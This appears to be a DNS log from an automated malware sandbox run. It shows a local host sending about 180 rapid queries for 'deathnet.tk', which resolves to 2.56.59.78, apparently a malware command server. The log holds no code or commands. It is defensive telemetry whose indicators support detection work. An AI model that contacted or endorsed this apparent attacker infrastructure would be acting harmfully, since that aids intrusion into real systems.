              Mar 21, 2022 20:09:30.771887064 CET192.168.2.238.8.8.80x4340Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.816102982 CET192.168.2.238.8.8.80xdb6fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.860831022 CET192.168.2.238.8.8.80xc33bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.905253887 CET192.168.2.238.8.8.80x5110Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.950278044 CET192.168.2.238.8.8.80xf1a3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.995335102 CET192.168.2.238.8.8.80xab9bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.038631916 CET192.168.2.238.8.8.80x79f5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.081907034 CET192.168.2.238.8.8.80xc30aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.126998901 CET192.168.2.238.8.8.80xf73dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.171952963 CET192.168.2.238.8.8.80xa060Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.216418982 CET192.168.2.238.8.8.80x7a00Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.261535883 CET192.168.2.238.8.8.80x6764Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.311646938 CET192.168.2.238.8.8.80x15b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.357803106 CET192.168.2.238.8.8.80xf0f0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.404561996 CET192.168.2.238.8.8.80x14d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.447626114 CET192.168.2.238.8.8.80x30d8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.491874933 CET192.168.2.238.8.8.80x399fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.538307905 CET192.168.2.238.8.8.80x233fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.590787888 CET192.168.2.238.8.8.80x66d4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.643923998 CET192.168.2.238.8.8.80x86b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.691168070 CET192.168.2.238.8.8.80x41d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.735773087 CET192.168.2.238.8.8.80x52a7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.779490948 CET192.168.2.238.8.8.80x3fc6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.824157953 CET192.168.2.238.8.8.80x514eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.869549990 CET192.168.2.238.8.8.80x8a7eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.912719965 CET192.168.2.238.8.8.80xb5eaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.960652113 CET192.168.2.238.8.8.80xc69eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.008635044 CET192.168.2.238.8.8.80x7d5dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.053509951 CET192.168.2.238.8.8.80xf4e9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.098733902 CET192.168.2.238.8.8.80x86d9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.146560907 CET192.168.2.238.8.8.80xdd74Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.189213991 CET192.168.2.238.8.8.80xd06Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.236265898 CET192.168.2.238.8.8.80xa20dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.284951925 CET192.168.2.238.8.8.80x89e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.331793070 CET192.168.2.238.8.8.80xdf12Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.375246048 CET192.168.2.238.8.8.80xb20aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.419523001 CET192.168.2.238.8.8.80xdc12Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.471946955 CET192.168.2.238.8.8.80xfffbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.516215086 CET192.168.2.238.8.8.80xf998Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.561144114 CET192.168.2.238.8.8.80x382dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.606311083 CET192.168.2.238.8.8.80xffcdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.650861025 CET192.168.2.238.8.8.80x334fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.699836969 CET192.168.2.238.8.8.80x15c2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.758538008 CET192.168.2.238.8.8.80xd29cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.802445889 CET192.168.2.238.8.8.80xffc4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.853773117 CET192.168.2.238.8.8.80x11d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.896395922 CET192.168.2.238.8.8.80x42d7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.941765070 CET192.168.2.238.8.8.80xcd48Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.986984968 CET192.168.2.238.8.8.80xc6c4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.035305977 CET192.168.2.238.8.8.80x1c7dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.079415083 CET192.168.2.238.8.8.80x4117Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.124506950 CET192.168.2.238.8.8.80x22b7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.169452906 CET192.168.2.238.8.8.80x6b57Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.212372065 CET192.168.2.238.8.8.80x1a1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.256948948 CET192.168.2.238.8.8.80xe6feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.305026054 CET192.168.2.238.8.8.80xe142Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.347800016 CET192.168.2.238.8.8.80x1164Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.392580032 CET192.168.2.238.8.8.80x2332Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.437629938 CET192.168.2.238.8.8.80xab95Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.483076096 CET192.168.2.238.8.8.80xe188Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.526688099 CET192.168.2.238.8.8.80x9f42Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.573106050 CET192.168.2.238.8.8.80xb039Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.634433985 CET192.168.2.238.8.8.80x8523Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.680356979 CET192.168.2.238.8.8.80xa9ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.725634098 CET192.168.2.238.8.8.80x564bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.770740986 CET192.168.2.238.8.8.80x6128Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.818211079 CET192.168.2.238.8.8.80xcca9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.865658045 CET192.168.2.238.8.8.80x2b3eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.910729885 CET192.168.2.238.8.8.80xd134Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.956458092 CET192.168.2.238.8.8.80x413fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.002098083 CET192.168.2.238.8.8.80x738bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.048821926 CET192.168.2.238.8.8.80xae23Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.094413996 CET192.168.2.238.8.8.80x60d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.142618895 CET192.168.2.238.8.8.80xbef9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.190076113 CET192.168.2.238.8.8.80xdaedStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.235482931 CET192.168.2.238.8.8.80x2d1fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.280370951 CET192.168.2.238.8.8.80x8e9fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.323399067 CET192.168.2.238.8.8.80xbe98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.368944883 CET192.168.2.238.8.8.80xb7e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.413063049 CET192.168.2.238.8.8.80xb9a3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.455951929 CET192.168.2.238.8.8.80xbc1dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.500895977 CET192.168.2.238.8.8.80x72c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.547661066 CET192.168.2.238.8.8.80xe017Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.592905998 CET192.168.2.238.8.8.80x7a87Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.639718056 CET192.168.2.238.8.8.80x8b2dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.686026096 CET192.168.2.238.8.8.80x8177Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.731744051 CET192.168.2.238.8.8.80xa3e2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.778647900 CET192.168.2.238.8.8.80xf87bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.834044933 CET192.168.2.238.8.8.80x9499Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.879059076 CET192.168.2.238.8.8.80x6d10Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.923849106 CET192.168.2.238.8.8.80x470aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.967546940 CET192.168.2.238.8.8.80xb838Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.010658979 CET192.168.2.238.8.8.80x9777Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.055445910 CET192.168.2.238.8.8.80x586Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.098356962 CET192.168.2.238.8.8.80xcda9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.143395901 CET192.168.2.238.8.8.80x4cafStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.188158989 CET192.168.2.238.8.8.80x739bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.232822895 CET192.168.2.238.8.8.80x7677Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.277606010 CET192.168.2.238.8.8.80x3b69Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.321719885 CET192.168.2.238.8.8.80x85e2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.364801884 CET192.168.2.238.8.8.80x5782Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.409738064 CET192.168.2.238.8.8.80x404aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.452653885 CET192.168.2.238.8.8.80x6550Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.495528936 CET192.168.2.238.8.8.80xf8a3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.540147066 CET192.168.2.238.8.8.80x23cfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.582834959 CET192.168.2.238.8.8.80x85a7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.625710964 CET192.168.2.238.8.8.80x506cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.671510935 CET192.168.2.238.8.8.80x22dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.718766928 CET192.168.2.238.8.8.80xd127Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.763629913 CET192.168.2.238.8.8.80x4588Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.810180902 CET192.168.2.238.8.8.80x4238Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.856004953 CET192.168.2.238.8.8.80x890aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.901370049 CET192.168.2.238.8.8.80x61f6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.946336985 CET192.168.2.238.8.8.80x18d3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.991693974 CET192.168.2.238.8.8.80x81d4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.035978079 CET192.168.2.238.8.8.80xf483Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.081298113 CET192.168.2.238.8.8.80x2e52Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.129981995 CET192.168.2.238.8.8.80x181Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.175056934 CET192.168.2.238.8.8.80xf8f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.217956066 CET192.168.2.238.8.8.80xfb9fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.261326075 CET192.168.2.238.8.8.80xaa9fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.304323912 CET192.168.2.238.8.8.80xb618Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.351212978 CET192.168.2.238.8.8.80x197eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.401299953 CET192.168.2.238.8.8.80xa399Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.458586931 CET192.168.2.238.8.8.80x4c1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.503084898 CET192.168.2.238.8.8.80xf08fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.549206018 CET192.168.2.238.8.8.80xdaf5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.592808008 CET192.168.2.238.8.8.80xf35fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.638787031 CET192.168.2.238.8.8.80xebc7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.686095953 CET192.168.2.238.8.8.80x106eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.734493017 CET192.168.2.238.8.8.80xbcfdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.783663988 CET192.168.2.238.8.8.80x7f11Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.831794024 CET192.168.2.238.8.8.80xdfb7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.878253937 CET192.168.2.238.8.8.80xb6c1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.924448013 CET192.168.2.238.8.8.80x29c2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.969445944 CET192.168.2.238.8.8.80xb79cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.015053988 CET192.168.2.238.8.8.80xd374Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.060832024 CET192.168.2.238.8.8.80x74dcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.104010105 CET192.168.2.238.8.8.80x5dfcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.150566101 CET192.168.2.238.8.8.80xaff3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.196746111 CET192.168.2.238.8.8.80xa0fdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.242381096 CET192.168.2.238.8.8.80x2facStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.290875912 CET192.168.2.238.8.8.80xcaafStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.336785078 CET192.168.2.238.8.8.80x2e17Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.382011890 CET192.168.2.238.8.8.80x98a5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.427095890 CET192.168.2.238.8.8.80xf0afStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.470709085 CET192.168.2.238.8.8.80x1610Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.518882036 CET192.168.2.238.8.8.80x7ae5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.566803932 CET192.168.2.238.8.8.80xc663Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.615483999 CET192.168.2.238.8.8.80xa9bfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.661004066 CET192.168.2.238.8.8.80x259eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.703794003 CET192.168.2.238.8.8.80xff45Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.748182058 CET192.168.2.238.8.8.80x6fd1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.790796995 CET192.168.2.238.8.8.80xf209Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.835371017 CET192.168.2.238.8.8.80x7358Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.881942034 CET192.168.2.238.8.8.80x60b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.930871964 CET192.168.2.238.8.8.80xc510Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.975411892 CET192.168.2.238.8.8.80x3ffeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.020107985 CET192.168.2.238.8.8.80xa8e1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.065325975 CET192.168.2.238.8.8.80xfc7fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.110219002 CET192.168.2.238.8.8.80xc275Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.158653975 CET192.168.2.238.8.8.80x8794Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.207146883 CET192.168.2.238.8.8.80x1587Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.252317905 CET192.168.2.238.8.8.80xc19dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.297899008 CET192.168.2.238.8.8.80x2684Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.343260050 CET192.168.2.238.8.8.80x1976Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.388850927 CET192.168.2.238.8.8.80x2397Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.433990002 CET192.168.2.238.8.8.80xcdf8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.477207899 CET192.168.2.238.8.8.80x7f1fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.523993015 CET192.168.2.238.8.8.80x1fd9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.571758032 CET192.168.2.238.8.8.80x1850Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.621018887 CET192.168.2.238.8.8.80x371fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.668168068 CET192.168.2.238.8.8.80x99acStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.714603901 CET192.168.2.238.8.8.80xb166Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.758848906 CET192.168.2.238.8.8.80xc94bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.811063051 CET192.168.2.238.8.8.80x7522Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.860059023 CET192.168.2.238.8.8.80x6d71Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Mar 21, 2022 20:07:37.131860018 CET8.8.8.8192.168.2.230x514No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.179088116 CET8.8.8.8192.168.2.230xc44fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.225120068 CET8.8.8.8192.168.2.230x1a6cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.271126986 CET8.8.8.8192.168.2.230x8577No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.314111948 CET8.8.8.8192.168.2.230xe746No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.356898069 CET8.8.8.8192.168.2.230xd88bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.402755976 CET8.8.8.8192.168.2.230xab4eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.446249008 CET8.8.8.8192.168.2.230x1c3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.502983093 CET8.8.8.8192.168.2.230xf93aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.548485994 CET8.8.8.8192.168.2.230x438dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.594485044 CET8.8.8.8192.168.2.230xd7b2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.647850990 CET8.8.8.8192.168.2.230x934aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.693793058 CET8.8.8.8192.168.2.230xad88No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.740488052 CET8.8.8.8192.168.2.230x905aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.787724018 CET8.8.8.8192.168.2.230x43b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.837284088 CET8.8.8.8192.168.2.230x396dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.883579969 CET8.8.8.8192.168.2.230xb255No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.931953907 CET8.8.8.8192.168.2.230x751bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.982733011 CET8.8.8.8192.168.2.230x3916No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.032052994 CET8.8.8.8192.168.2.230xb6f0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.079778910 CET8.8.8.8192.168.2.230xe1eaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.126904011 CET8.8.8.8192.168.2.230x9033No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.172447920 CET8.8.8.8192.168.2.230x4ccfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.218410015 CET8.8.8.8192.168.2.230xb1c5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.263662100 CET8.8.8.8192.168.2.230xfd1eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.308511972 CET8.8.8.8192.168.2.230x8ff1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.353763103 CET8.8.8.8192.168.2.230x2a6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.398250103 CET8.8.8.8192.168.2.230x8942No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.450354099 CET8.8.8.8192.168.2.230x930eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.495569944 CET8.8.8.8192.168.2.230x5de9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.541472912 CET8.8.8.8192.168.2.230x38d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.587477922 CET8.8.8.8192.168.2.230xd524No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.633038998 CET8.8.8.8192.168.2.230x3308No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.677666903 CET8.8.8.8192.168.2.230x7e98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.723011017 CET8.8.8.8192.168.2.230x4ffbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.765952110 CET8.8.8.8192.168.2.230xf134No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.811472893 CET8.8.8.8192.168.2.230x19e4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
